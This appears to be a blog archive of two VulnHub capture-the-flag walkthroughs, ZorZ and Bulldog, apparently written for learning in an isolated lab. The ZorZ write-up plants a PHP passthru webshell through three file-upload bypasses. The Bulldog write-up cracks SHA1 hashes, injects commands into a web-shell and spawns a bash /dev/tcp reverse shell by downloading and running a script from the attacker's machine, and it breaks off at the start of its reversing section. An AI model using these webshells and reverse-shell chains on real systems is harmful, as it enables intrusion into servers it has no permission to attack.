have fun! admin@top-hat-sec.com\nPre-Intro - Setting Up the VM using VirtualBox # As a VulnHub box, you will need to run it as a virtual machine on your own system. 
There are many ways to do this, but in my opinion, VirtualBox is the easiest. I run mine using VBox on a Kali host machine using a Host-Only Network.\nYou can download it from VulnHub at https://www.vulnhub.com/entry/tophatsec-zorz,117/\nOnce you have VirtualBox installed, you can simply use the \u0026ldquo;Import Appliance\u0026rdquo; feature to import the OVA file.\nIt is safest to run your Vulnerable VMs on a Host-Only network, which is not connected to the internet.\nYou can find a guide to setting up your Host-Only network here\nOnce your Host-Only Network is set up, set up the VM to connect to the Host-Only Network.\nThen you are ready to begin!\nInitial Scans # First thing we will need to do is FIND the box. By default, our host-only network is set to 192.168.56.0-255, so we will scan it with nmap.\nnmap -sn -T5 192.168.56.0/24 In my case, my box was assigned the IP 192.168.56.102\nNormally I go ahead and add this to /etc/hosts, but this caused me some trouble this time around, so I opted to just identify it by IP.\nWe know from the description that the box is running a webserver, but just to confirm this we will run a fast nmap scan. We\u0026rsquo;ll also create a new directory to keep ourselves organized.\nnmap -F -T4 192.168.56.102 Our webserver is running on the standard port, so we can go ahead and view it in the browser.\nLevel One # Let\u0026rsquo;s see what we can find out by uploading an image. For this box, I found a creative commons image and made it nice and small. It will be advantageous to use the same image as is shown here, but you can use any image you like. Here is our Test Burrito!\nIf you want to change the file type, just change the URL’s extension to .gif or .png to download other versions. Save it with\nwget https://i.imgur.com/29eCDkq.png -O test_burrito.png Go to the upload page and try to upload it – let’s see what happens.\nWe get this message:\nIt seems to have worked, but we don’t quite know where the file ended up. 
If we are going to run any of our payloads, we will need to find that out.\nIf we try the /test_burrito.png url, we get a 404.\nLet’s try a directory bruteforcer to see if we can find out where the image uploads. For our wordlist, we’ll use dirbuster’s small directory list, which is found by default on Kali. It can be found at /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt, but you can also find it at\nhttps://raw.githubusercontent.com/berzerk0/pastehost/master/directory-list-2.3-small.txt.\nLet’s make a copy into our working ‘a_pentest’ directory.\ncp /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir_list.txt or download it from the above link.\nMy favorite directory bruteforcer is dirsearch. It runs in Python 3, meaning you will not have any trouble getting it to run on whatever operating system you are using. On my Kali system, I have mine installed to /opt/Web_Tools, but you can download it to and run it from your current directory as well.\ngit clone https://github.com/maurosoria/dirsearch will clone the repository to your current directory.\ngit clone https://github.com/maurosoria/dirsearch /opt/dirsearch will clone it to a folder called dirsearch in your /opt/ directory.\nDirsearch requires some extensions to test for, but we aren’t looking for any of those right now. The last page we saw used the .php extension, so we will use .php. Make sure you run the command in the same directory as your copy of the wordlist, or you will have to specify the full path there as well.\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u http://192.168.56.102/ -e php -w dir_list.txt Depending on your machine, the search will take 1-5 minutes. We find a few results, but since we are looking for a place where our image was uploaded, /uploads2/ seems the most interesting. Visit in the browser.\nI don’t see test_burrito.png here. Hmm, this must not be the right directory. Let’s think about what we’ve done so far. 
We ignored a link that said \u0026ldquo;Try Image Uploader2\u0026rdquo; - which probably places its files into the uploads2 directory. Maybe ours is in uploads1?\nThere we go! Okay, we know how to upload files and confirm they have been uploaded. If we click on the link to the image, we can view it all by itself in the browser. Perfect, this means if we can figure out how to upload code, we can run it directly.\nSo we know we can upload images, but just because our website says “Image Uploader” doesn’t mean we can ONLY upload images. Let’s try some arbitrary text file, and see if that will work for us.\nCreate a simple textfile and try to upload it the same way. I am going to create mine using…\necho 'An image is worth 1000 words.' \u0026gt; proverb.txt Let’s try uploading it.\nIt worked! Now let’s pay it a visit at /uploads1/proverb.txt\nSuccess! It doesn’t look like this site is checking our files very closely. Now that we have proven we can upload text files, let’s try to upload a payload script and start the attack. Since we know we are running php, we can use a php \u0026ldquo;microshell\u0026rdquo; which allows us to simply add commands we want to run on the webserver at the end of a URL. I got this microshell script from the Red Team Field Manual by Ben Clark.\n\u0026lt;?php passthru($_GET[\u0026quot;cmd\u0026quot;]); ?\u0026gt;\nI save mine to a text file using echo.\necho '\u0026lt;?php passthru($_GET[\u0026quot;cmd\u0026quot;]); ?\u0026gt;' \u0026gt; php-microshell.php You can copy and paste if you like, but make sure that your browser doesn’t change the quotation mark characters out of plaintext! 
If you want to be sure, just delete them and add them yourself.\nIf you want to be REALLY sure, you can download the shell from me.\nIf this shell works the way we hoped, we can just append \u0026ldquo;?cmd=commands\u0026rdquo; (without quotation marks) to the end of our URL.\nGo ahead and upload the php-microshell.php using the same method we have used so far, then visit /uploads1/php-microshell.php\nThere is nothing here! Well, not yet. We need to add some commands into the URL first.\nVisit http://192.168.56.102/uploads1/php-microshell.php?cmd=pwd\nWe have successfully injected a command! This proves we could cause all sorts of trouble on the webserver. We could read files, start a reverse shell, download malware, install another backdoor, or anything else we want! This is a BIG vulnerability.\nLet’s see what else we can find out about the website. If we jump out one directory and run ls, we’ll be able to see what other directories this website has to offer.\nVisit http://192.168.56.102/uploads1/php-microshell.php?cmd=cd .. ; ls\nAll of those seem like they’d belong on a normal website, except for \u0026ldquo;l337saucel337\u0026rdquo; - let’s see what it has to offer. Now that we know that this directory exists, we COULD just view it in the browser… but that’s no fun! Let’s use our shell to view it instead.\nhttp://192.168.56.102/uploads1/php-microshell.php?cmd=ls -l ../l337saucel337\nWell, that’s obviously meant for us to leave alone and not bother with. I mean, it IS a secret.\nhttp://192.168.56.102/uploads1/php-microshell.php?cmd=cat%20../l337saucel337/SECRETFILE\nHey! That was a secret! Stop that!\nAlright, we have two more uploaders to try, so let’s go to http://192.168.56.102/index2.html and try the next one!\nLevel Two # Visit http://192.168.56.102/index2.html\nThis looks pretty similar. We already know about /uploads2, so we shouldn’t have to enumerate as much here. 
Let’s go ahead and try to upload our microshell again, just to see if we can.\nThis uploader must be checking to see that our files really are images.\nLet’s see if we can overcome this hurdle using the caveman method and just append \u0026ldquo;.png\u0026rdquo; to the end of our script’s filename.\ncp php-microshell.php php-microshell.png.php It is possible that we can trick the file checker this way, if it is only looking at the filename itself.\nIt was not fooled.\nWe need to try a bit of mischief. Web Application testing software like BurpSuite and OWASP ZAP have the ability to \u0026ldquo;catch\u0026rdquo; http requests before they are sent along to the webserver from the browser. We are going to use OWASP ZAP to try to upload our image, then interrupt ourselves and change the content of the file after it leaves the browser, but before it gets to the webserver.\nWithin our browser, it will look just like the file uploads we have done so far, but this time, we will alter what is received by the webserver by running it through a proxy. You will need to have OWASP Zap on your machine to follow along. It is possible to recreate this process in other ways, but for demonstrative purposes, we are going to use ZAP.\nZAP is the \u0026ldquo;Zed Attack Proxy,\u0026rdquo; and we will need to tell our browser that we are using a proxy. By default, ZAP runs on the localhost at port 8008 (127.0.0.1:8008), which we will have to set up in our browser.\nFirefox does have built in proxy preferences, but endorses the FoxyProxy plugin in its Proxy Error messages. (Which I saw while trying to set up the proxy without FoxyProxy)\nIf you aren’t using Kali, go ahead and download the latest version of FoxyProxy and skip the next section.\nKali and FoxyProxy: # At the time of this writing, FoxyProxy’s newest available version doesn’t play well with Kali’s LTS Firefox version. 
This isn’t that much of a problem, since we can still use the “Old” version from earlier this year.\nKeep in mind that 99.9% of the time, you should USE THE LATEST VERSIONS OF EVERYTHING. Frequently updating your software will keep you safer than any antivirus program ever could. We are allowing ourselves to run the older version because we aren’t connecting to the real internet, only to a VM that doesn’t have the ability to access the internet without us setting it up – which we haven’t. (You are using a Host-Only Network, right? Don’t connect intentionally vulnerable systems to the internet!)\nGet your FoxyProxy Version 4.6.5 here https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/versions/4.6.5\nEnd of Kali Section\nWith your FoxyProxy installed, open it up and set up your Proxy.\nHit the \u0026ldquo;Add new proxy\u0026rdquo; button, and put in our ZAP parameters of “127.0.0.1:8008”\nThen, select the \u0026ldquo;General\u0026rdquo; tab and name the proxy \u0026ldquo;8080\u0026rdquo; - or whatever you will recognize.\nNow right click the proxy icon, and select \u0026ldquo;Use Proxy “8080” for all URLs\u0026rdquo; - the fox in the icon should turn blue. If you were to try to visit a page now, you will get a proxy error. This is because we have not yet started ZAP. Do so now.\nWhen you open it up, ZAP will greet you with the window shown below. Saving your session is entirely optional. I selected the \u0026ldquo;No\u0026rdquo; option and then the “Start” button.\nWith ZAP up and running, visit http://192.168.56.102/index2.html – this should appear in the ZAP history.\nAll of our interactions in the browser will be noticed by ZAP. In addition to merely logging our upload actions, we want ZAP to intercept at the right time. 
The easiest way to do this is to upload something, then set a \u0026ldquo;Breakpoint\u0026rdquo; on that activity.\nBegin by uploading the test burrito.\nThis will show up in the ZAP history.\nRight click the history entry and select the \u0026ldquo;Break\u0026rdquo; option from the menu. Then hit \u0026ldquo;Save\u0026rdquo; on the window that appears.\nNow, any interactions that involve a request to /uploader2.php will be intercepted by ZAP. Let’s see if we can upload the test burrito, then alter the data to include our microshell instead.\nBegin by re-uploading the test burrito. ZAP will intercept the request and allow you to edit it.\nIf we look closely at our request, we will see our file has been given a \u0026ldquo;Content-Type\u0026rdquo; Label of \u0026ldquo;image/png\u0026rdquo; and the filename of \u0026ldquo;test_burrito.png.\u0026rdquo;\nBelow those labels is the actual data of the image, which is rendered into text as unicode characters. However, in ZAP, we can edit everything in the request. The first attack we will attempt will be to replace everything after \u0026ldquo;image/png\u0026rdquo; with our microshell code. We will also change the filename to \u0026ldquo;shell_burrito.png\u0026rdquo; to avoid any \u0026ldquo;this file already exists\u0026rdquo; errors.\nThen we hit the \u0026ldquo;Submit and Step To the next request or response\u0026rdquo; button at the top. It is found between the green circle and the greyish triangle.\nIf we hit this button once, we will get a preview of the response. Our file did not successfully upload. If we hit it again, this will show up in the browser as well.\nRats. Don’t worry, however, since this tells us what our next step will be. We know that the file checker does not rely on extensions and the \u0026ldquo;Content Type\u0026rdquo; field to decide what kinds of files it is looking at. 
This means it likely uses the \u0026ldquo;Magic Bytes\u0026rdquo; method of looking at some of the data at the beginning of a file and making a determination based on that.\nThis changes our attack very slightly. Instead of deleting ALL of the information in the file, we know we just need to allow some to remain at the beginning before sneaking in the microshell.\nUpload the test burrito and alter the request. Chop off most of the file’s data, but leave a bit at the beginning. Then, change the filename to not_a_microshell.png\nThen hit the Step Through button again.\nSuccess!\nLet’s visit the file’s location. We already know about the /uploads2 folder, so let’s see if it’s in there.\nErrors! This message suggests that we need to include .php in our filename, since it didn\u0026rsquo;t like when we tried to upload a .php file, so maybe we need to call our new file microshell.php.png\nRepeat the upload and request editing process, but change the filename to microshell.php.png\nThen step through.\nSuccess! Our \u0026ldquo;image file\u0026rdquo; has been uploaded!\nLet’s visit it at http://192.168.56.102/uploads2/microshell.php.png\nWe have a bit of the data left over, but this is our shell! We can try injecting commands into the URL just like we did for Level 1.\nVisit http://192.168.56.102/uploads2/microshell.php.png?cmd=echo%20this%20shell%20works\nNow visit http://192.168.56.102/uploads2/php-microshell.php.png?cmd=cat%20../l337saucel337/SECRETFILE to see the flag!\nLevel Three # This level uses Javascript, but our attack methodology still applies. Since we already have ZAP running, we can repeat the successful process we did in Level Two.\nWe begin by uploading the test burrito, and then trying to find out where it is kept on the server.\nClick \u0026ldquo;Upload\u0026rdquo; when you are ready.\nHow convenient! Our site tells us exactly where the file is stored! Let’s check on it to verify.\nLooks good, it even made it into the favicon! 
Let’s set a breakpoint in ZAP like we did for level two, then try to repeat our process. We want to catch the HTTP request, change the data to our php-microshell (except for some bytes at the start), and change the filename to php-microshell.php.png\nLastly, we can visit it in the browser to make sure it is working as expected.\nhttp://192.168.56.102/uploads3/php-microshell.php.png\nThere it is! The same result as level 2! Let’s prove it works by dropping in some commands.\nhttp://192.168.56.102/uploads3/php-microshell.php.png?cmd=echo this shell works on level 3; id\nEverything works the way it did in Level 2 and we have code execution on the webserver.\nConclusion # If you\u0026rsquo;d like to learn more about File Upload Vulnerabilities, check out these links:\nOWASP\u0026rsquo;s Page on Unrestricted File Uploads Hacksplaining on File Upload Vulnerabilities, including a nice section on prevention. A SANS Whitepaper Thanks to TopHatSec for the VM!\n","date":"20 November 2017","externalUrl":null,"permalink":"/archive/ctf-writeups/zorz-vulnhub/","section":"Archive","summary":"","title":"ZorZ - A Few WebApp File Upload Vulnerabilities Explained","type":"archive"},{"content":" Archived Content The items in the archive are frozen in time and will not be updated.\nThere are two versions of this walkthrough: This is the original, NON-INTRODUCTORY VERSION. # A fun box from Vulnhub, written by Nick Frichette. You can find it here at https://www.vulnhub.com/entry/bulldog-1,211/\nHere is the description by the author:\nBulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don\u0026rsquo;t you find out? :)\nAfter their hack by the BlackHat German Shepherds, Bulldog Industries has brought us in to find the rest of the vulnerabilities. They will be happy they did!\nIntroduction # I liked this box for several reasons:\nBulldogs are the best, come on. 
The Django webserver was a nice new (to me) exploration of a webserver implementation It sticks to the basics while still providing an interesting challenge. There is an attempt to create a real-world context. This write up assumes the reader is using Kali, but all the tools are standard (unless mentioned) in distros like BlackArch as well – except for dirsearch, but you can use dirb or dirbuster as replacements if you like. I ran it on my native Kali host machine using VirtualBox; on a host-only network.\nBefore beginning, I added its IP to my hosts file for convenience.\nMethod # 1. Initial Scans # nmap -sV -T4 bulldog.ctf -oA nmap_JustVersions_bulldog Let’s see, we have SSH on a non-standard port, and two HTTP ports using a Python-based webserver. That’s new to me.\nLet’s start with HTTP, primarily out of habit.\nWith HTTP, I always run nikto, nmap with vulnscan and dirsearch – all at the same time. This is one of the reasons I like tabbed terminal emulators. I use terminator, which is heavy, but I run Kali natively on my desktop so it doesn’t cause too much of a problem. A lighter alternative is Sakura.\nFirst, we run nikto, which often gives me the juiciest pieces of info.\nnikto -h http://bulldog.ctf -output nikto_bulldog.txt That /dev folder might be interesting, we’ll check it first when we do our manual scan.\nNext, we try dirsearch.\nI keep dirsearch in my /opt directory with other Web Tools, and run it twice, with a lot of extensions. 
I’m trying to be more thorough, and since it is an automated tool, this seems like a good place to start.\nI run it with a script that contains two scans, one with the default wordlist, and one with the medium dirbuster wordlist found (on Kali) in /usr/share/wordlists/dirbuster/\nHere’s my script if you want to give it a go:\n#!/bin/bash\n#dirsearchem\n#$1 box name\n#$2 URL (check for Domain, HTTPS, port first)\nclear\ndate\necho \u0026#34;Running dirsearch on $1 $2\u0026#34;\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u \u0026#34;$2\u0026#34; -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar --plain-text-report=dirsearch_$1_quick\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u \u0026#34;$2\u0026#34; -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --plain-text-report=dirsearch_$1_BigList\ndate\necho \u0026#34;Finished dirsearch on $1 at $2\u0026#34;\nFor demo reasons, I will do these two scans separately. The second scan is often overkill.\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u bulldog.ctf -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar --plain-text-report=dirsearch_bulldog_quick Okay, those look very interesting. We will add /admin and /robots.txt to the list, then begin the big dirsearch scan.\npython3 /opt/Web_Tools/dirsearch/dirsearch.py -u bulldog.ctf -e sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --plain-text-report=dirsearch_bulldog_bigList Lastly, before browsing around using the “look at it with my eyeballs” scan, we run a full nmap scan with the vulnerability script.\nnmap -A --script=vuln -T4 bulldog.ctf -oA nmap_FullWithVuln_bulldog We’ll give these scans a moment, and begin our manual scan.\n2. 
Manual Website Investigation # Woof. Business operations are suspended! We have to save the bulldogs! Let’s investigate this public notice.\nI appreciate it when CTF authors slip a bit of humor into their machines. However, it seems to me that the only useful information is that the dirtycow exploit will probably not work on this box. (\u0026ldquo;Smelly cow?\u0026rdquo;)\nLet’s check on the big dirsearch list and see if it caught anything new.\nDoesn’t look like it. /notice is new, but that’s the page we are looking at. If we get stuck later we can try dirsearching again and adding -f or -r to force extensions and search recursively.\nAlright, let’s dive into the manual scan, armed with our list of /dev, /admin and /robots.txt. I like to start with robots.txt, since it might contain info that our scans couldn’t access.\nOh no! ASCII art, the mark of a true elite hacker! We will have to remember to deface… I mean, fix this later on. It doesn’t contain anything new however. Let’s check /dev.\n(At this point, I checked on my nmap vulnscan – it had not found anything new, but it did find /robots.txt and /dev “interesting”)\nI like a CTF with an attempt to create real-world context. This is full of useful information.\nTeam Lead: Alan Brooke (sounds like an admin to me) The previous team exploited a webserver vulnerability to gain a low-priv shell then gained root with dirtycow. (A solid strategy, which I will try to reproduce) “We are using some files which may be corrupted from original system\u0026hellip;” (perhaps I can use some of the same strategies the Shepherds used) “We are removing PHP entirely from the new server” (Okay, no php shells) “\u0026hellip;we will not be using PHPMyAdmin or any other popular CMS system\u0026hellip;” (This means that the phpmyadmin I found may be useless. But, rolling your own CMS sounds prone to misconfigurations.) 
New website is written entirely in Django\nSSH is enabled, but a Web-Shell is also in use (this shell must be written in Django like everything else)\nMongoDB is not FULLY installed, but might be partially installed.\n“It touts being able to run every minute\u0026hellip;” (Sounds like cronjobs to me)\nA list of usernames is presented to us.\nThe bright-blue “Web-Shell” is a link that takes us to /dev/shell – but we need to log in to the website before being able to access it. My next goal is to access that Web-Shell, and exploit it. Before I do that, I’ll need to appear like I have logged in.\n3. Logging into the Website # Let’s check out that /admin page\nWe have a list of many usernames, so technically we can assume we are halfway to a valid set of login credentials. We have emails, but I don’t think any of them will respond to any phishing attempts.\nWe’ve been told that the site uses Django for everything, and this is also announced at the top of the page. Django’s ORM parameterizes its queries, so SQL injection is unlikely to be the way in here.\nHmm, we can start digging through some page sources to see if we can find something useful. I first checked /admin’s source, but didn’t find anything I knew how to use at this time. There is an interesting POST field called “csrfmiddlewaretoken”, which is Django’s built-in CSRF protection: the token in the form has to match the csrftoken cookie, or the POST is rejected.\n/dev is directed to internal developers, so it is more likely to have informative comments.\nWell, those comments have the potential to be VERY informative. “Django\u0026rsquo;s default is too complex\u0026hellip; It\u0026rsquo;s not like a hacker can do anything with a hash” - daring us to prove them wrong. (Django’s default is salted PBKDF2-SHA256, which is exactly what makes a leaked hash hard to use; an unsalted SHA1 is not.)\nI copied the emails and hashes into the useful email:hash format. Before I introduce them to my friend John, let’s see what type of hash they are. Now, you can quickly do this on Kali using\nhashid -m THE_HASH\nbut I want to maybe not just identify the hash format, but crack it at the same time, if I can. Enter Hash-Buster. 
From experience, I am going to guess they’re SHA1. Hash-Buster seems to only work for SHA1 and MD5 hashes, but that suits us fine.\npython /opt/Hashing_Tools/Hash-Buster/hash.py\nOkay, we have SHA1, but it didn’t crack. Luckily, we have many hashes to choose from. We can try them all. For best results, let’s run them through John the Ripper and then check them in Hash-Buster while that is running.\nI’m going to use my own wordlist here, my commonly used Top32Million-probable.txt that you can find in my Probable-Wordlists repo – this particular list can’t be downloaded from GitHub directly, but torrents and MegaUpload links are provided.\nYou don’t HAVE to use that wordlist, but I had more success with it than the default option. For honesty’s sake, I’ll mention that rockyou works well too.\njohn dev_hashes.txt --format=Raw-SHA1 --wordlist=~/Wordlists/Top32Million-probable.txt\nSomehow, I don’t find those results surprising. We do have two FULL login credentials now, so let’s try them.\n(For completeness’ sake, I ran all of the hashes through Hash-Buster, and none came up ¯\\_(ツ)_/¯ - You can google them (and should normally, but that can lead to walkthroughs online and spoilers. Then again, here you are reading one of those – so go nuts!)\nWe COULD try them on the website login, where we know they will probably work, but people reuse passwords all the time. The client has not closed SSH yet, so let’s try there!\nssh nick@bulldog.ctf -p 23 - and his password\nssh sarah@bulldog.ctf -p 23 - and her password\nNo luck, but keeping it simple can yield great results.\nSo, we have two usernames to choose from. Nick works on the site’s backend, and Sarah runs the database. Backend might have access to the server, but database might have access to more credentials. Both are good choices, so let’s try both!\nMake sure you hit “Log Out” between attempts, or you’ll get stuck in cookie limbo. 
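The identify-then-crack step from the two sections above, written out in plain Python as an added example. It is not the author's tooling and not a stand-in for hashid, Hash-Buster or john; the email addresses, the wordlist and the digests are constructed here so it runs offline, and the length-based identification is a guess in the same way hashid's first answer is.

```python
import hashlib
import re

# Constructed sample in the email:hash layout the author builds from the /dev
# page comments. Addresses are placeholders and the digests are computed here
# from guessable passwords so the example runs offline.
SAMPLE_LINES = [
    "nick@example.com:" + hashlib.sha1(b"bulldog").hexdigest(),
    "sarah@example.com:" + hashlib.sha1(b"bulldoglover").hexdigest(),
    "alan@example.com:" + hashlib.md5(b"password1").hexdigest(),
    "unknown@example.com:" + hashlib.sha1(b"correct horse battery staple").hexdigest(),
]

# Tiny constructed wordlist standing in for rockyou / Top32Million-probable.
WORDLIST = ["123456", "password", "bulldog", "bulldoglover", "password1", "sarah"]

# Hex digest length is the cheapest hash-type hint (what hashid keys on first).
BY_HEX_LENGTH = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}


def identify(hexdigest):
    """Guess the algorithm from the digest's hex length; None if it is not hex."""
    if not re.fullmatch(r"[0-9a-fA-F]+", hexdigest or ""):
        return None
    return BY_HEX_LENGTH.get(len(hexdigest))


def parse(lines):
    """email:hash lines -> list of (email, algo, lowercase hex).
    Lines whose hash part is not recognised are skipped."""
    out = []
    for line in lines:
        email, _, digest = line.strip().partition(":")
        digest = digest.strip()
        algo = identify(digest)
        if algo:
            out.append((email.strip(), algo, digest.lower()))
    return out


def crack(lines, wordlist):
    """Dictionary attack. Because these hashes are unsalted, each candidate is
    hashed once per algorithm and then compared against ALL targets at once,
    which is why one wordlist pass over a whole dump is so cheap.
    Returns {email: plaintext} for the hashes that were recovered."""
    targets = parse(lines)
    algos = {algo for _, algo, _ in targets}
    table = {}  # (algo, hexdigest) -> candidate password
    for word in wordlist:
        data = word.encode()
        for algo in algos:
            table[(algo, hashlib.new(algo, data).hexdigest())] = word
    return {email: table[(algo, digest)]
            for email, algo, digest in targets if (algo, digest) in table}


if __name__ == "__main__":
    for email, password in crack(SAMPLE_LINES, WORDLIST).items():
        print(f"{email}: {password}")
```

The one-table-for-all-targets trick in crack() is the practical meaning of "you DO need to use those more complicated hashes" in the lessons below: a per-user salt forces the attacker to redo the whole wordlist for every user, and a slow KDF like Django's PBKDF2 makes each of those passes expensive.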
I logged in with both and got an identical not-very-promising screen for each user.\nHowever, armed with a logged-in session, we can access the web-shell! Go to /dev/shell and let’s see what we can do.\n4. Exploiting the Web-Shell # \u0026ldquo;All commands are run on the server itself\u0026rdquo; is SCREAMING command injection. We want to run commands here, so we have to figure out how to get arbitrary commands through.\nWhat do we know?\nIt\u0026rsquo;s running Django, a Python web framework. The shell is probably handing our input to something like subprocess with shell=True or os.system (the Python analogue of \u0026ldquo;exec\u0026rdquo; in PHP), but there might be some “if” statement checking for the right commands. I wonder if we can trick this if statement by using one of the commands on the list, then, once it passes that check, executing any command we want.\nLet’s try something like ;\nls; pwd;\nOh no! The internet police are coming after me!\nLet’s try \u0026amp;\u0026amp;\nThis is promising, but pwd is on the list of approved commands. Let’s try something unapproved, like id, whoami or cd.\npwd \u0026amp;\u0026amp; id \u0026amp;\u0026amp; whoami \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; pwd\nNot only do we find out we can run commands, but we find out we can run sudo!\nLet’s see if we can use this to run a reverse shell. I have had mixed success with nc using the -e flag, so my go-to shell command is:\nbash -i \u0026gt;\u0026amp; /dev/tcp/local.machine.ip.addr/PORTNUM 0\u0026gt;\u0026amp;1\nwhich we need to run after pwd or one of the other commands – after we have set up our listener, of course.\nOn our local machine, we run:\nnc -lnvp 51000 - or any port number you like. And then on the Web-Shell, try running:\npwd \u0026amp;\u0026amp; bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.56.1/51000 0\u0026gt;\u0026amp;1\nIt didn’t like that, or give us a shell – but we didn’t get a “not allowed” error. That\u0026rsquo;s called progress! 
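The kind of check the author is guessing at, and why "pwd && id" walks straight through it, as an added Python example. This is not the box's code (the page never shows it): the allow-list is an assumption, since the page only tells us pwd is permitted and id, whoami and cd are not. The hardened version beside it is the fix a Django developer should have shipped: parse the line into argv, validate every token, and never hand the string to a shell.

```python
import re
import shlex
import subprocess

# Assumed allow-list for the hypothetical web-shell; the page only tells us
# that pwd is permitted and id/whoami/cd are not.
ALLOWED = {"pwd", "ls", "echo"}


def vulnerable_allows(command: str) -> bool:
    """The check the author guesses at: only the first word is inspected,
    and the whole string is later handed to a shell."""
    first = command.strip().split(" ", 1)[0]
    return first in ALLOWED


def run_vulnerable(command: str) -> str:
    """Executes whatever passes vulnerable_allows(). With shell=True the
    string goes through /bin/sh, so '&&', ';', '|' and redirections are
    all interpreted: 'pwd && id' runs id."""
    if not vulnerable_allows(command):
        raise ValueError("not allowed")
    return subprocess.check_output(command, shell=True, text=True)


# Minimal token allow-list: letters, digits, '_', '.', '/', '-'.
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./-]+$")


def hardened_argv(command: str):
    """Parse with shlex, require an allow-listed program, require every
    argument to be a plain token. Returns argv or None if rejected."""
    try:
        argv = shlex.split(command)
    except ValueError:  # unbalanced quotes etc.
        return None
    if not argv or argv[0] not in ALLOWED:
        return None
    if not all(SAFE_ARG.match(arg) for arg in argv[1:]):
        return None
    return argv


def run_hardened(command: str) -> str:
    """Runs argv directly (shell=False): the kernel execs argv[0], no shell
    ever sees the line, so there is nothing for '&&' to mean."""
    argv = hardened_argv(command)
    if argv is None:
        raise ValueError("not allowed")
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for line in ["pwd", "pwd && id", "ls; pwd;", "id"]:
        print(f"{line!r:14} filter-only: {vulnerable_allows(line)!s:5} argv: {hardened_argv(line)}")
```

run_vulnerable() really executes what you give it; it is there to show the bypass, not to be reused. The SAFE_ARG regex is only a token allow-list: a path argument like ../../etc/passwd still passes it, so a real deployment needs its own policy for which paths the allow-listed commands may touch, on top of never using a shell.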
My go-to method to get around this is to write a script containing the more complicated or powerful commands I want to run, then to run a command to download and execute that script using simpler commands. It usually comes in these three parts:\nCreating a script containing a reverse shell spawning command, which is, in this case, bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.56.1/51000 0\u0026gt;\u0026amp;1\nHosting this script in a location the machine we want the reverse shell on can download from. In this case I am running a host-only network, so I will host it on my local machine.\nDownloading the script to a writable directory, then making it executable and running it. This last part usually uses wget to download the script to a writable directory like /tmp, and then running chmod +x script.sh and bash script.sh - so, we need to check if our user can run these commands.\nIn the webshell, we run\npwd \u0026amp;\u0026amp; which wget \u0026amp;\u0026amp; which chmod \u0026amp;\u0026amp; which bash \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; pwd \u0026amp;\u0026amp; ls -la\nThis one-liner will tell us if wget, chmod and bash are on the PATH, while also double-checking that we can write to /tmp.\nAll good news! We can run all of those commands, AND can write to /tmp – this means we are ready to set up our HTTP server and download the script!\nOn our host machine, we write our shell script to a .sh file. I did this with a simple:\necho \u0026quot;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.56.1/51000 0\u0026gt;\u0026amp;1\u0026quot; \u0026gt; script.sh\nThen, we start our SimpleHTTPServer in that same directory with\npython -m SimpleHTTPServer 51001\n(That is the Python 2 module; on Python 3 the equivalent is python3 -m http.server 51001.) Our host machine is ready to serve up a freshly baked script. 
Make sure your listener is running, then we need to execute the change directory, download, make executable and run operation in the Web-Shell.\npwd \u0026amp;\u0026amp; cd /tmp \u0026amp;\u0026amp; wget http://192.168.56.1:51001/script.sh \u0026amp;\u0026amp; chmod +x script.sh \u0026amp;\u0026amp; bash script.sh\nMake sure your ports are right! The HTTP server port is 51001 and the listener port is 51000.\n5. Enumerating With A User Shell # We have some enumeration and privesc shell scripts handy, but before we go downloading and running them, we should try some simple things.\nSince this box is simulating a real world experience, we may see some common user missteps, such as leaving important notes and reminders lying around. Usually, these users would leave these things in a home folder – or maybe in emails.\nLet’s see what we can see in the /home directory.\ncd /home \u0026amp;\u0026amp; ls\nWe can see here that Nick and Sarah don’t have home folders on this machine; there are just bulldogadmin and django. Luckily, we ARE django.\nls *\nshows us the non-hidden contents of the directories. Just a quick check to see if root_password_do_not_touch.txt is in any of these folders. Perhaps that file is hidden?\nls -la *\n.hiddenadmindirectory is not a standard directory, and we can look inside!\nls -a bulldogadmin/.hiddenadmindirectory\nA note? Could this be our AdminPassNoHackersPlz.txt file?\ncd bulldogadmin/.hiddenadmindirectory; cat note\n\u0026quot;\u0026hellip;the webserver is the… …one who needs to have root access\u0026hellip;\u0026quot; is all I needed to hear to get me interested. Right now, we are running as the webserver, and root access would be just lovely.\nThe other lines that got my attention were \u0026ldquo;Once I’m finished with it, a hacker wouldn’t even be able to reverse it,\u0026rdquo; and \u0026quot;…it’s still a prototype right now.\u0026quot;\nMaybe WE can reverse it.\n6. Reversing to Root # As of this writing, I am pretty new to reverse engineering. 
